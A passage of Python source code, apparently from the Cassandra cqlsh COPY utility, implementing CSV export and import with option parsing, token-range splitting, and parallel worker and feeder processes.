return dict([(k, v if k not in ['errfile', 'ratefile'] else v)
for k, v, in opts.items()])
def parse_options(self, opts, direction):
"""
Parse options for import (COPY FROM) and export (COPY TO) operations.
Extract from opts csv and dialect options.
:return: 3 dictionaries: the csv options, the dialect options, any unrecognized options.
"""
shell = self.shell
opts = self.clean_options(self.maybe_read_config_file(opts, direction))
dialect_options = dict()
dialect_options['quotechar'] = ensure_str(opts.pop('quote', '"'))
dialect_options['escapechar'] = ensure_str(opts.pop('escape', '\\'))
dialect_options['delimiter'] = ensure_str(opts.pop('delimiter', ','))
if dialect_options['quotechar'] == dialect_options['escapechar']:
dialect_options['doublequote'] = True
del dialect_options['escapechar']
else:
dialect_options['doublequote'] = False
copy_options = dict()
copy_options['nullval'] = ensure_str(opts.pop('null', ''))
copy_options['header'] = bool(opts.pop('header', '').lower() == 'true')
copy_options['encoding'] = opts.pop('encoding', 'utf8')
copy_options['maxrequests'] = int(opts.pop('maxrequests', 6))
copy_options['pagesize'] = int(opts.pop('pagesize', 1000))
# by default the page timeout is 10 seconds per 1000 entries
# in the page size or 10 seconds if pagesize is smaller
copy_options['pagetimeout'] = int(opts.pop('pagetimeout', max(10, 10 * (copy_options['pagesize'] / 1000))))
copy_options['maxattempts'] = int(opts.pop('maxattempts', 5))
copy_options['dtformats'] = DateTimeFormat(opts.pop('datetimeformat', shell.display_timestamp_format),
shell.display_date_format, shell.display_nanotime_format,
milliseconds_only=True)
copy_options['floatprecision'] = int(opts.pop('floatprecision', '5'))
copy_options['doubleprecision'] = int(opts.pop('doubleprecision', '12'))
copy_options['chunksize'] = int(opts.pop('chunksize', 5000))
copy_options['ingestrate'] = int(opts.pop('ingestrate', 100000))
copy_options['maxbatchsize'] = int(opts.pop('maxbatchsize', 20))
copy_options['minbatchsize'] = int(opts.pop('minbatchsize', 10))
copy_options['reportfrequency'] = float(opts.pop('reportfrequency', 0.25))
copy_options['consistencylevel'] = shell.consistency_level
copy_options['decimalsep'] = opts.pop('decimalsep', '.')
copy_options['thousandssep'] = opts.pop('thousandssep', '')
copy_options['boolstyle'] = [ensure_str(s.strip()) for s in opts.pop('boolstyle', 'True, False').split(',')]
copy_options['numprocesses'] = int(opts.pop('numprocesses', self.get_num_processes(16)))
copy_options['begintoken'] = opts.pop('begintoken', '')
copy_options['endtoken'] = opts.pop('endtoken', '')
copy_options['maxrows'] = int(opts.pop('maxrows', '-1'))
copy_options['skiprows'] = int(opts.pop('skiprows', '0'))
copy_options['skipcols'] = opts.pop('skipcols', '')
copy_options['maxparseerrors'] = int(opts.pop('maxparseerrors', '-1'))
copy_options['maxinserterrors'] = int(opts.pop('maxinserterrors', '1000'))
copy_options['errfile'] = safe_normpath(opts.pop('errfile', 'import_%s_%s.err' % (self.ks, self.table,)))
copy_options['ratefile'] = safe_normpath(opts.pop('ratefile', ''))
copy_options['maxoutputsize'] = int(opts.pop('maxoutputsize', '-1'))
copy_options['preparedstatements'] = bool(opts.pop('preparedstatements', 'true').lower() == 'true')
copy_options['ttl'] = int(opts.pop('ttl', -1))
# Hidden properties, they do not appear in the documentation but can be set in config files
# or on the cmd line but w/o completion
copy_options['maxinflightmessages'] = int(opts.pop('maxinflightmessages', '512'))
copy_options['maxbackoffattempts'] = int(opts.pop('maxbackoffattempts', '12'))
copy_options['maxpendingchunks'] = int(opts.pop('maxpendingchunks', '24'))
# set requesttimeout to a value high enough so that maxbatchsize rows will never timeout if the server
# responds: here we set it to 1 sec per 10 rows but no less than 60 seconds
copy_options['requesttimeout'] = int(opts.pop('requesttimeout', max(60, 1 * copy_options['maxbatchsize'] / 10)))
# set childtimeout higher than requesttimeout so that child processes have a chance to report request timeouts
copy_options['childtimeout'] = int(opts.pop('childtimeout', copy_options['requesttimeout'] + 30))
self.check_options(copy_options)
return CopyOptions(copy=copy_options, dialect=dialect_options, unrecognized=opts)
@staticmethod
def check_options(copy_options):
"""
Check any options that require a sanity check beyond a simple type conversion and if required
raise a value error:
- boolean styles must be exactly 2, they must be different and they cannot be empty
"""
bool_styles = copy_options['boolstyle']
if len(bool_styles) != 2 or bool_styles[0] == bool_styles[1] or not bool_styles[0] or not bool_styles[1]:
raise ValueError("Invalid boolean styles %s" % copy_options['boolstyle'])
@staticmethod
def get_num_processes(cap):
"""
Pick a reasonable number of child processes. We need to leave at
least one core for the parent or feeder process.
"""
return max(1, min(cap, CopyTask.get_num_cores() - 1))
@staticmethod
def get_num_cores():
"""
Return the number of cores if available. If the test environment variable
is set, then return the number carried by this variable. This is to test single-core
machine more easily.
"""
try:
num_cores_for_testing = os.environ.get('CQLSH_COPY_TEST_NUM_CORES', '')
ret = int(num_cores_for_testing) if num_cores_for_testing else mp.cpu_count()
printdebugmsg("Detected %d core(s)" % (ret,))
return ret
except NotImplementedError:
printdebugmsg("Failed to detect number of cores, returning 1")
return 1
@staticmethod
def describe_interval(seconds):
desc = []
for length, unit in ((86400, 'day'), (3600, 'hour'), (60, 'minute')):
num = int(seconds) / length
if num > 0:
desc.append('%d %s' % (num, unit))
if num > 1:
desc[-1] += 's'
seconds %= length
words = '%.03f seconds' % seconds
if len(desc) > 1:
words = ', '.join(desc) + ', and ' + words
elif len(desc) == 1:
words = desc[0] + ' and ' + words
return words
@staticmethod
def get_columns(shell, ks, table, columns):
"""
Return all columns if none were specified or only the columns specified.
Possible enhancement: introduce a regex like syntax (^) to allow users
to specify all columns except a few.
"""
return shell.get_column_names(ks, table) if not columns else columns
def close(self):
self.stop_processes()
self.inmsg.close()
self.outmsg.close()
def num_live_processes(self):
return sum(1 for p in self.processes if p.is_alive())
@staticmethod
def get_pid():
return os.getpid() if hasattr(os, 'getpid') else None
@staticmethod
def trace_process(pid):
if pid and STRACE_ON:
os.system("strace -vvvv -c -o strace.{pid}.out -e trace=all -p {pid}&".format(pid=pid))
def start_processes(self):
for i, process in enumerate(self.processes):
process.start()
self.trace_process(process.pid)
self.trace_process(self.get_pid())
def stop_processes(self):
for process in self.processes:
process.terminate()
def make_params(self):
"""
Return a dictionary of parameters to be used by the worker processes.
On platforms using 'spawn' as the default multiprocessing start method,
this dictionary must be picklable.
"""
shell = self.shell
return dict(ks=self.ks,
table=self.table,
local_dc=self.host.datacenter,
columns=self.columns,
options=self.options,
connect_timeout=shell.conn.connect_timeout,
hostname=self.host.address,
port=shell.port,
ssl=shell.ssl,
auth_provider=shell.auth_provider,
cql_version=shell.conn.cql_version,
config_file=self.config_file,
protocol_version=self.protocol_version,
debug=shell.debug,
coverage=shell.coverage,
coveragerc_path=shell.coveragerc_path
)
def validate_columns(self):
shell = self.shell
if not self.columns:
shell.printerr("No column specified")
return False
for c in self.columns:
if c not in self.table_meta.columns:
shell.printerr('Invalid column name %s' % (c,))
return False
return True
def update_params(self, params, i):
"""
Add the communication pipes to the parameters to be passed to the worker process:
inpipe is the message pipe flowing from parent to child process, so outpipe from the parent point
of view and, vice-versa, outpipe is the message pipe flowing from child to parent, so inpipe
from the parent point of view, hence the two are swapped below.
"""
params['inpipe'] = self.outmsg.pipes[i]
params['outpipe'] = self.inmsg.pipes[i]
return params
class ExportWriter(object):
"""
A class that writes to one or more csv files, or STDOUT
"""
def __init__(self, fname, shell, columns, options):
self.fname = fname
self.shell = shell
self.columns = columns
self.options = options
self.header = options.copy['header']
self.max_output_size = int(options.copy['maxoutputsize'])
self.current_dest = None
self.num_files = 0
if self.max_output_size > 0:
if fname is not None:
self.write = self._write_with_split
self.num_written = 0
else:
shell.printerr("WARNING: maxoutputsize {} ignored when writing to STDOUT".format(self.max_output_size))
self.write = self._write_without_split
else:
self.write = self._write_without_split
def open(self):
self.current_dest = self._get_dest(self.fname)
if self.current_dest is None:
return False
if self.header:
writer = csv.writer(self.current_dest.output, **self.options.dialect)
writer.writerow([ensure_str(c) for c in self.columns])
return True
def close(self):
self._close_current_dest()
def _next_dest(self):
self._close_current_dest()
self.current_dest = self._get_dest(self.fname + '.%d' % (self.num_files,))
def _get_dest(self, source_name):
"""
Open the output file if any or else use stdout. Return a namedtuple
containing the out and a boolean indicating if the output should be closed.
"""
CsvDest = namedtuple('CsvDest', 'output close')
if self.fname is None:
return CsvDest(output=sys.stdout, close=False)
else:
try:
ret = CsvDest(output=open(source_name, 'w'), close=True)
self.num_files += 1
return ret
except IOError as e:
self.shell.printerr("Can't open %r for writing: %s" % (source_name, e))
return None
def _close_current_dest(self):
if self.current_dest and self.current_dest.close:
self.current_dest.output.close()
self.current_dest = None
def _write_without_split(self, data, _):
"""
Write the data to the current destination output.
"""
self.current_dest.output.write(data)
def _write_with_split(self, data, num):
"""
Write the data to the current destination output if we still
haven't reached the maximum number of rows. Otherwise split
the rows between the current destination and the next.
"""
if (self.num_written + num) > self.max_output_size:
num_remaining = self.max_output_size - self.num_written
last_switch = 0
for i, row in enumerate([_f for _f in data.split(os.linesep) if _f]):
if i == num_remaining:
self._next_dest()
last_switch = i
num_remaining += self.max_output_size
self.current_dest.output.write(row + '\n')
self.num_written = num - last_switch
else:
self.num_written += num
self.current_dest.output.write(data)
class ExportTask(CopyTask):
"""
A class that exports data to .csv by instantiating one or more processes that work in parallel (ExportProcess).
"""
def __init__(self, shell, ks, table, columns, fname, opts, protocol_version, config_file):
CopyTask.__init__(self, shell, ks, table, columns, fname, opts, protocol_version, config_file, 'to')
options = self.options
self.begin_token = int(options.copy['begintoken']) if options.copy['begintoken'] else None
self.end_token = int(options.copy['endtoken']) if options.copy['endtoken'] else None
self.writer = ExportWriter(fname, shell, columns, options)
def run(self):
"""
Initiates the export by starting the worker processes.
Then hand over control to export_records.
"""
shell = self.shell
if self.options.unrecognized:
shell.printerr('Unrecognized COPY TO options: %s' % ', '.join(list(self.options.unrecognized.keys())))
return
if not self.validate_columns():
return 0
ranges = self.get_ranges()
if not ranges:
return 0
if not self.writer.open():
return 0
columns = "[" + ", ".join(self.columns) + "]"
self.printmsg("\nStarting copy of %s.%s with columns %s." % (self.ks, self.table, columns), encoding=self.encoding)
params = self.make_params()
for i in range(self.num_processes):
self.processes.append(ExportProcess(self.update_params(params, i)))
self.start_processes()
try:
self.export_records(ranges)
finally:
self.close()
def close(self):
CopyTask.close(self)
self.writer.close()
def get_ranges(self):
"""
return a queue of tuples, where the first tuple entry is a token range (from, to]
and the second entry is a list of hosts that own that range. Each host is responsible
for all the tokens in the range (from, to].
The ring information comes from the driver metadata token map, which is built by
querying System.PEERS.
We only consider replicas that are in the local datacenter. If there are no local replicas
we use the cqlsh session host.
"""
shell = self.shell
hostname = self.host.address
local_dc = self.host.datacenter
ranges = dict()
min_token = self.get_min_token()
begin_token = self.begin_token
end_token = self.end_token
def make_range(prev, curr):
"""
Return the intersection of (prev, curr) and (begin_token, end_token),
return None if the intersection is empty
"""
ret = (prev, curr)
if begin_token:
if curr < begin_token:
return None
elif (prev is None) or (prev < begin_token):
ret = (begin_token, curr)
if end_token:
if (ret[0] is not None) and (ret[0] > end_token):
return None
elif (curr is not None) and (curr > end_token):
ret = (ret[0], end_token)
return ret
def make_range_data(replicas=None):
hosts = []
if replicas:
for r in replicas:
if r.is_up is not False and r.datacenter == local_dc:
hosts.append(r.address)
if not hosts:
hosts.append(hostname) # fallback to default host if no replicas in current dc
return {'hosts': tuple(hosts), 'attempts': 0, 'rows': 0, 'workerno': -1}
if begin_token and begin_token < min_token:
shell.printerr('Begin token %d must be bigger or equal to min token %d' % (begin_token, min_token))
return ranges
if begin_token and end_token and begin_token > end_token:
shell.printerr('Begin token %d must be smaller than end token %d' % (begin_token, end_token))
return ranges
if shell.conn.metadata.token_map is None or min_token is None:
ranges[(begin_token, end_token)] = make_range_data()
return ranges
ring = list(shell.get_ring(self.ks).items())
ring.sort()
if not ring:
# If the ring is empty we get the entire ring from the host we are currently connected to
ranges[(begin_token, end_token)] = make_range_data()
elif len(ring) == 1:
# If there is only one token we get the entire ring from the replicas for that token
ranges[(begin_token, end_token)] = make_range_data(ring[0][1])
else:
# else we loop on the ring
first_range_data = None
previous = None
for token, replicas in ring:
if not first_range_data:
first_range_data = make_range_data(replicas) # we use it at the end when wrapping around
if token.value == min_token:
continue # avoids looping entire ring
current_range = make_range(previous, token.value)
if not current_range:
continue
ranges[current_range] = make_range_data(replicas)
previous = token.value
# For the last ring interval we query the same replicas that hold the first token in the ring
if previous is not None and (not end_token or previous < end_token):
ranges[(previous, end_token)] = first_range_data
elif previous is None and (not end_token or previous < end_token):
previous = begin_token if begin_token else min_token
ranges[(previous, end_token)] = first_range_data
if not ranges:
shell.printerr('Found no ranges to query, check begin and end tokens: %s - %s' % (begin_token, end_token))
return ranges
def get_min_token(self):
"""
:return the minimum token, which depends on the partitioner.
For partitioners that do not support tokens we return None, in
this cases we will not work in parallel, we'll just send all requests
to the cqlsh session host.
"""
partitioner = self.shell.conn.metadata.partitioner
if partitioner.endswith('RandomPartitioner'):
return -1
elif partitioner.endswith('Murmur3Partitioner'):
return -(2 ** 63) # Long.MIN_VALUE in Java
else:
return None
def send_work(self, ranges, tokens_to_send):
prev_worker_no = ranges[tokens_to_send[0]]['workerno']
i = prev_worker_no + 1 if -1 <= prev_worker_no < (self.num_processes - 1) else 0
for token_range in tokens_to_send:
ranges[token_range]['workerno'] = i
self.outmsg.channels[i].send((token_range, ranges[token_range]))
ranges[token_range]['attempts'] += 1
i = i + 1 if i < self.num_processes - 1 else 0
def export_records(self, ranges):
"""
Send records to child processes and monitor them by collecting their results
or any errors. We terminate when we have processed all the ranges or when one child
process has died (since in this case we will never get any ACK for the ranges
processed by it and at the moment we don't keep track of which ranges a
process is handling).
"""
shell = self.shell
processes = self.processes
meter = RateMeter(log_fcn=self.printmsg,
update_interval=self.options.copy['reportfrequency'],
log_file=self.options.copy['ratefile'])
total_requests = len(ranges)
max_attempts = self.options.copy['maxattempts']
self.send_work(ranges, list(ranges.keys()))
num_processes = len(processes)
succeeded = 0
failed = 0
while (failed + succeeded) < total_requests and self.num_live_processes() == num_processes:
for token_range, result in self.inmsg.recv(timeout=0.1):
if token_range is None and result is None: # a request has finished
succeeded += 1
elif isinstance(result, Exception): # an error occurred
# This token_range failed, retry up to max_attempts if no rows received yet,
# If rows were already received we'd risk duplicating data.
# Note that there is still a slight risk of duplicating data, even if we have
# an error with no rows received yet, it's just less likely. To avoid retrying on
# all timeouts would however mean we could risk not exporting some rows.
if ranges[token_range]['attempts'] < max_attempts and ranges[token_range]['rows'] == 0:
shell.printerr('Error for %s: %s (will try again later attempt %d of %d)'
% (token_range, result, ranges[token_range]['attempts'], max_attempts))
self.send_work(ranges, [token_range])
else:
shell.printerr('Error for %s: %s (permanently given up after %d rows and %d attempts)'
% (token_range, result, ranges[token_range]['rows'],
ranges[token_range]['attempts']))
failed += 1
else: # partial result received
data, num = result
self.writer.write(data, num)
meter.increment(n=num)
ranges[token_range]['rows'] += num
if self.num_live_processes() < len(processes):
for process in processes:
if not process.is_alive():
shell.printerr('Child process %d died with exit code %d' % (process.pid, process.exitcode))
if succeeded < total_requests:
shell.printerr('Exported %d ranges out of %d total ranges, some records might be missing'
% (succeeded, total_requests))
self.printmsg("\n%d rows exported to %d files in %s." %
(meter.get_total_records(),
self.writer.num_files,
self.describe_interval(time.time() - self.time_start)))
class FilesReader(object):
"""
A wrapper around a csv reader to keep track of when we have
exhausted reading input files. We are passed a comma separated
list of paths, where each path is a valid glob expression.
We generate a source generator and we read each source one
by one.
"""
def __init__(self, fname, options):
self.chunk_size = options.copy['chunksize']
self.header = options.copy['header']
self.max_rows = options.copy['maxrows']
self.skip_rows = options.copy['skiprows']
self.fname = fname
self.sources = None # must be created later due to pickle problems on Windows
self.num_sources = 0
self.current_source = None
self.num_read = 0
def get_source(self, paths):
"""
Return a source generator. Each source is a named tuple
wrapping the source input, file name and a boolean indicating
if it requires closing.
"""
def make_source(fname):
try:
return open(fname, 'r')
except IOError as e:
raise IOError("Can't open %r for reading: %s" % (fname, e))
for path in paths.split(','):
path = path.strip()
if os.path.isfile(path):
yield make_source(path)
else:
result = glob.glob(path)
if len(result) == 0:
raise IOError("Can't open %r for reading: no matching file found" % (path,))
for f in result:
yield (make_source(f))
def start(self):
self.sources = self.get_source(self.fname)
self.next_source()
@property
def exhausted(self):
return not self.current_source
def next_source(self):
"""
Close the current source, if any, and open the next one. Return true
if there is another source, false otherwise.
"""
self.close_current_source()
while self.current_source is None:
try:
self.current_source = next(self.sources)
if self.current_source:
self.num_sources += 1
except StopIteration:
return False
if self.header:
next(self.current_source)
return True
def close_current_source(self):
if not self.current_source:
return
self.current_source.close()
self.current_source = None
def close(self):
self.close_current_source()
def read_rows(self, max_rows):
if not self.current_source:
return []
rows = []
for i in range(min(max_rows, self.chunk_size)):
try:
row = next(self.current_source)
self.num_read += 1
if 0 <= self.max_rows < self.num_read:
self.next_source()
break
if self.num_read > self.skip_rows:
rows.append(row)
except StopIteration:
self.next_source()
break
return [_f for _f in rows if _f]
class PipeReader(object):
"""
A class for reading rows received on a pipe, this is used for reading input from STDIN
"""
def __init__(self, inpipe, options):
self.inpipe = inpipe
self.chunk_size = options.copy['chunksize']
self.header = options.copy['header']
self.max_rows = options.copy['maxrows']
self.skip_rows = options.copy['skiprows']
self.num_read = 0
self.exhausted = False
self.num_sources = 1
def start(self):
pass
def read_rows(self, max_rows):
rows = []
for i in range(min(max_rows, self.chunk_size)):
row = self.inpipe.recv()
if row is None:
self.exhausted = True
break
self.num_read += 1
if 0 <= self.max_rows < self.num_read:
self.exhausted = True
break # max rows exceeded
if self.header or self.num_read < self.skip_rows:
self.header = False # skip header or initial skip_rows rows
continue
rows.append(row)
return rows
class ImportProcessResult(object):
"""
An object sent from ImportProcess instances to the parent import task in order to indicate progress.
"""
def __init__(self, imported=0):
self.imported = imported
class FeedingProcessResult(object):
"""
An object sent from FeedingProcess instances to the parent import task in order to indicate progress.
"""
def __init__(self, sent, reader):
self.sent = sent
self.num_sources = reader.num_sources
self.skip_rows = reader.skip_rows
class ImportTaskError(object):
"""
An object sent from child processes (feeder or workers) to the parent import task to indicate an error.
"""
def __init__(self, name, msg, rows=None, attempts=1, final=True):
self.name = name
self.msg = msg
self.rows = rows if rows else []
self.attempts = attempts
self.final = final
def is_parse_error(self):
"""
We treat read and parse errors as unrecoverable and we have different global counters for giving up when
a maximum has been reached. We consider value and type errors as parse errors as well since they
are typically non recoverable.
"""
name = self.name
return name.startswith('ValueError') or name.startswith('TypeError') or \
name.startswith('ParseError') or name.startswith('IndexError') or name.startswith('ReadError')
class ImportErrorHandler(object):
"""
A class for managing import errors
"""
def __init__(self, task):
self.shell = task.shell
self.options = task.options
self.max_attempts = self.options.copy['maxattempts']
self.max_parse_errors = self.options.copy['maxparseerrors']
self.max_insert_errors = self.options.copy['maxinserterrors']
self.err_file = self.options.copy['errfile']
self.parse_errors = 0
self.insert_errors = 0
self.num_rows_failed = 0
if os.path.isfile(self.err_file):
now = datetime.datetime.now()
old_err_file = self.err_file + now.strftime('.%Y%m%d_%H%M%S')
printdebugmsg("Renaming existing %s to %s\n" % (self.err_file, old_err_file))
os.rename(self.err_file, old_err_file)
def max_exceeded(self):
if self.insert_errors > self.max_insert_errors >= 0:
self.shell.printerr("Exceeded maximum number of insert errors %d" % self.max_insert_errors)
return True
if self.parse_errors > self.max_parse_errors >= 0:
self.shell.printerr("Exceeded maximum number of parse errors %d" % self.max_parse_errors)
return True
return False
def add_failed_rows(self, rows):
self.num_rows_failed += len(rows)
with open(self.err_file, "a") as f:
writer = csv.writer(f, **self.options.dialect)
for row in rows:
writer.writerow(row)
def handle_error(self, err):
"""
Handle an error by printing the appropriate error message and incrementing the correct counter.
"""
shell = self.shell
if err.is_parse_error():
self.parse_errors += len(err.rows)
self.add_failed_rows(err.rows)
shell.printerr("Failed to import %d rows: %s - %s, given up without retries"
% (len(err.rows), err.name, err.msg))
else:
if not err.final:
shell.printerr("Failed to import %d rows: %s - %s, will retry later, attempt %d of %d"
% (len(err.rows), err.name, err.msg, err.attempts, self.max_attempts))
else:
self.insert_errors += len(err.rows)
self.add_failed_rows(err.rows)
shell.printerr("Failed to import %d rows: %s - %s, given up after %d attempts"
% (len(err.rows), err.name, err.msg, err.attempts))
class ImportTask(CopyTask):
"""
A class to import data from .csv by instantiating one or more processes
that work in parallel (ImportProcess).
"""
def __init__(self, shell, ks, table, columns, fname, opts, protocol_version, config_file):
CopyTask.__init__(self, shell, ks, table, columns, fname, opts, protocol_version, config_file, 'from')
options = self.options
self.skip_columns = [c.strip() for c in self.options.copy['skipcols'].split(',')]
self.valid_columns = [c for c in self.columns if c not in self.skip_columns]
self.receive_meter = RateMeter(log_fcn=self.printmsg,
update_interval=options.copy['reportfrequency'],
log_file=options.copy['ratefile'])
self.error_handler = ImportErrorHandler(self)
self.feeding_result = None
self.sent = 0
def make_params(self):
ret = CopyTask.make_params(self)
ret['skip_columns'] = self.skip_columns
ret['valid_columns'] = self.valid_columns
return ret
def validate_columns(self):
if not CopyTask.validate_columns(self):
return False
shell = self.shell
if not self.valid_columns:
shell.printerr("No valid column specified")
return False
for c in self.table_meta.primary_key:
if c.name not in self.valid_columns:
shell.printerr("Primary key column '%s' missing or skipped" % (c.name,))
return False
return True
def run(self):
shell = self.shell
if self.options.unrecognized:
shell.printerr('Unrecognized COPY FROM options: %s' % ', '.join(list(self.options.unrecognized.keys())))
return
if not self.validate_columns():
return 0
columns = "[" + ", ".join(self.valid_columns) + "]"
self.printmsg("\nStarting copy of %s.%s with columns %s." % (self.ks, self.table, columns), encoding=self.encoding)
try:
params = self.make_params()
for i in range(self.num_processes - 1):
self.processes.append(ImportProcess(self.update_params(params, i)))
feeder = FeedingProcess(self.outmsg.pipes[-1], self.inmsg.pipes[-1],
self.outmsg.pipes[:-1], self.fname, self.options)
self.processes.append(feeder)
self.start_processes()
pr = profile_on() if PROFILE_ON else None
self.import_records()
if pr:
profile_off(pr, file_name='parent_profile_%d.txt' % (os.getpid(),))
except Exception as exc:
shell.printerr(str(exc))
if shell.debug:
traceback.print_exc()
return 0
finally:
self.close()
def send_stdin_rows(self):
"""
We need to pass stdin rows to the feeder process as it is not safe to pickle or share stdin
directly (in case of file the child process would close it). This is a very primitive support
for STDIN import in that we we won't start reporting progress until STDIN is fully consumed. I
think this is reasonable.
"""
shell = self.shell
self.printmsg("[Use . on a line by itself to end input]")
for row in shell.use_stdin_reader(prompt='[copy] ', until=r'.'):
self.outmsg.channels[-1].send(row)
self.outmsg.channels[-1].send(None)
if shell.tty:
print()
def import_records(self):
"""
Keep on running until we have stuff to receive or send and until all processes are running.
Send data (batches or retries) up to the max ingest rate. If we are waiting for stuff to
receive check the incoming queue.
"""
if not self.fname:
self.send_stdin_rows()
child_timeout = self.options.copy['childtimeout']
last_recv_num_records = 0
last_recv_time = time.time()
while self.feeding_result is None or self.receive_meter.total_records < self.feeding_result.sent:
self.receive_results()
if self.feeding_result is not None:
if self.receive_meter.total_records != last_recv_num_records:
last_recv_num_records = self.receive_meter.total_records
last_recv_time = time.time()
elif (time.time() - last_recv_time) > child_timeout:
self.shell.printerr("No records inserted in {} seconds, aborting".format(child_timeout))
break
if self.error_handler.max_exceeded() or not self.all_processes_running():
break
if self.error_handler.num_rows_failed:
self.shell.printerr("Failed to process %d rows; failed rows written to %s" %
(self.error_handler.num_rows_failed,
self.error_handler.err_file))
if not self.all_processes_running():
self.shell.printerr("{} child process(es) died unexpectedly, aborting"
.format(self.num_processes - self.num_live_processes()))
else:
if self.error_handler.max_exceeded():
self.processes[-1].terminate() # kill the feeder
for i, _ in enumerate(self.processes):
if self.processes[i].is_alive():
self.outmsg.channels[i].send(None)
# allow time for worker processes to exit cleanly
attempts = 50 # 100 milliseconds per attempt, so 5 seconds total
while attempts > 0 and self.num_live_processes() > 0:
time.sleep(0.1)
attempts -= 1
self.printmsg("\n%d rows imported from %d files in %s (%d skipped)." %
(self.receive_meter.get_total_records() - self.error_handler.num_rows_failed,
self.feeding_result.num_sources if self.feeding_result else 0,
self.describe_interval(time.time() - self.time_start),
self.feeding_result.skip_rows if self.feeding_result else 0))
def all_processes_running(self):
return self.num_live_processes() == len(self.processes)
def receive_results(self):
"""
Receive results from the worker processes, which will send the number of rows imported
or from the feeder process, which will send the number of rows sent when it has finished sending rows.
"""
aggregate_result = ImportProcessResult()
try:
for result in self.inmsg.recv(timeout=0.1):
if isinstance(result, ImportProcessResult):
aggregate_result.imported += result.imported
elif isinstance(result, ImportTaskError):
self.error_handler.handle_error(result)
elif isinstance(result, FeedingProcessResult):
self.feeding_result = result
else:
raise ValueError("Unexpected result: %s" % (result,))
finally:
self.receive_meter.increment(aggregate_result.imported)
class FeedingProcess(mp.Process):
"""
A process that reads from import sources and sends chunks to worker processes.
"""
def __init__(self, inpipe, outpipe, worker_pipes, fname, options):
super(FeedingProcess, self).__init__(target=self.run)
self.inpipe = inpipe
self.outpipe = outpipe
self.worker_pipes = worker_pipes
self.inmsg = None # must be created after forking on Windows
self.outmsg = None # must be created after forking on Windows
self.worker_channels = None # must be created after forking on Windows
self.reader = FilesReader(fname, options) if fname else PipeReader(inpipe, options)
self.send_meter = RateMeter(log_fcn=None, update_interval=1)
self.ingest_rate = options.copy['ingestrate']
self.num_worker_processes = options.copy['numprocesses']
self.max_pending_chunks = options.copy['maxpendingchunks']
self.chunk_id = 0
def on_fork(self):
"""
Create the channels and release any parent connections after forking,
see CASSANDRA-11749 for details.
"""
self.inmsg = ReceivingChannel(self.inpipe)
self.outmsg = SendingChannel(self.outpipe)
self.worker_channels = [SendingChannel(p) for p in self.worker_pipes]
def run(self):
pr = profile_on() if PROFILE_ON else None
self.inner_run()
if pr:
profile_off(pr, file_name='feeder_profile_%d.txt' % (os.getpid(),))
def inner_run(self):
"""
Send one batch per worker process to the queue unless we have exceeded the ingest rate.
In the export case we queue everything and let the worker processes throttle using max_requests,
here we throttle using the ingest rate in the feeding process because of memory usage concerns.
When finished we send back to the parent process the total number of rows sent.
"""
self.on_fork()
reader = self.reader
try:
reader.start()
except IOError as exc:
self.outmsg.send(ImportTaskError(exc.__class__.__name__, exc.message if hasattr(exc, 'message') else str(exc)))
channels = self.worker_channels
max_pending_chunks = self.max_pending_chunks
sent = 0
failed_attempts = 0
while not reader.exhausted:
channels_eligible = [c for c in channels if c.num_pending() < max_pending_chunks]
if not channels_eligible:
failed_attempts += 1
delay = randint(1, pow(2, failed_attempts))
printdebugmsg("All workers busy, sleeping for %d second(s)" % (delay,))
time.sleep(delay)
continue
elif failed_attempts > 0:
failed_attempts = 0
for ch in channels_eligible:
try:
max_rows = self.ingest_rate - self.send_meter.current_record
if max_rows <= 0:
self.send_meter.maybe_update(sleep=False)
continue
rows = reader.read_rows(max_rows)
if rows:
sent += self.send_chunk(ch, rows)
except Exception as exc:
self.outmsg.send(ImportTaskError(exc.__class__.__name__, exc.message if hasattr(exc, 'message') else str(exc)))
if reader.exhausted:
break
# send back to the parent process the number of rows sent to the worker processes
self.outmsg.send(FeedingProcessResult(sent, reader))
# wait for poison pill (None)
self.inmsg.recv()
def send_chunk(self, ch, rows):
self.chunk_id += 1
num_rows = len(rows)
self.send_meter.increment(num_rows)
ch.send({'id': self.chunk_id, 'rows': rows, 'imported': 0, 'num_rows_sent': num_rows})
return num_rows
def close(self):
self.reader.close()
self.inmsg.close()
self.outmsg.close()
for ch in self.worker_channels:
ch.close()
class ChildProcess(mp.Process):
"""
An child worker process, this is for common functionality between ImportProcess and ExportProcess.
"""
def __init__(self, params, target):
super(ChildProcess, self).__init__(target=target)
self.inpipe = params['inpipe']
self.outpipe = params['outpipe']
self.inmsg = None # must be initialized after fork on Windows
self.outmsg = None # must be initialized after fork on Windows
self.ks = params['ks']
self.table = params['table']
self.local_dc = params['local_dc']
self.columns = params['columns']
self.debug = params['debug']
self.port = params['port']
self.hostname = params['hostname']
self.connect_timeout = params['connect_timeout']
self.cql_version = params['cql_version']
self.auth_provider = params['auth_provider']
self.ssl = params['ssl']
self.protocol_version = params['protocol_version']
self.config_file = params['config_file']
options = params['options']
self.date_time_format = options.copy['dtformats']
self.consistency_level = options.copy['consistencylevel']
self.decimal_sep = options.copy['decimalsep']
self.thousands_sep = options.copy['thousandssep']
self.boolean_styles = options.copy['boolstyle']
self.max_attempts = options.copy['maxattempts']
self.encoding = options.copy['encoding']
# Here we inject some failures for testing purposes, only if this environment variable is set
if os.environ.get('CQLSH_COPY_TEST_FAILURES', ''):
self.test_failures = json.loads(os.environ.get('CQLSH_COPY_TEST_FAILURES', ''))
else:
self.test_failures = None
# attributes for coverage
self.coverage = params['coverage']
self.coveragerc_path = params['coveragerc_path']
self.coverage_collection = None
self.sigterm_handler = None
self.sighup_handler = None
def on_fork(self):
"""
Create the channels and release any parent connections after forking, see CASSANDRA-11749 for details.
"""
self.inmsg = ReceivingChannel(self.inpipe)
self.outmsg = SendingChannel(self.outpipe)
def close(self):
printdebugmsg("Closing queues...")
self.inmsg.close()
self.outmsg.close()
def start_coverage(self):
import coverage
self.coverage_collection = coverage.Coverage(config_file=self.coveragerc_path)
self.coverage_collection.start()
# save current handlers for SIGTERM and SIGHUP
self.sigterm_handler = signal.getsignal(signal.SIGTERM)
self.sighup_handler = signal.getsignal(signal.SIGTERM)
def handle_sigterm():
self.stop_coverage()
self.close()
self.terminate()
# set custom handler for SIGHUP and SIGTERM
# needed to make sure coverage data is saved
signal.signal(signal.SIGTERM, handle_sigterm)
signal.signal(signal.SIGHUP, handle_sigterm)
def stop_coverage(self):
self.coverage_collection.stop()
self.coverage_collection.save()
signal.signal(signal.SIGTERM, self.sigterm_handler)
signal.signal(signal.SIGHUP, self.sighup_handler)
class ExpBackoffRetryPolicy(RetryPolicy):
"""
A retry policy with exponential back-off for read timeouts and write timeouts
"""
def __init__(self, parent_process):
RetryPolicy.__init__(self)
self.max_attempts = parent_process.max_attempts
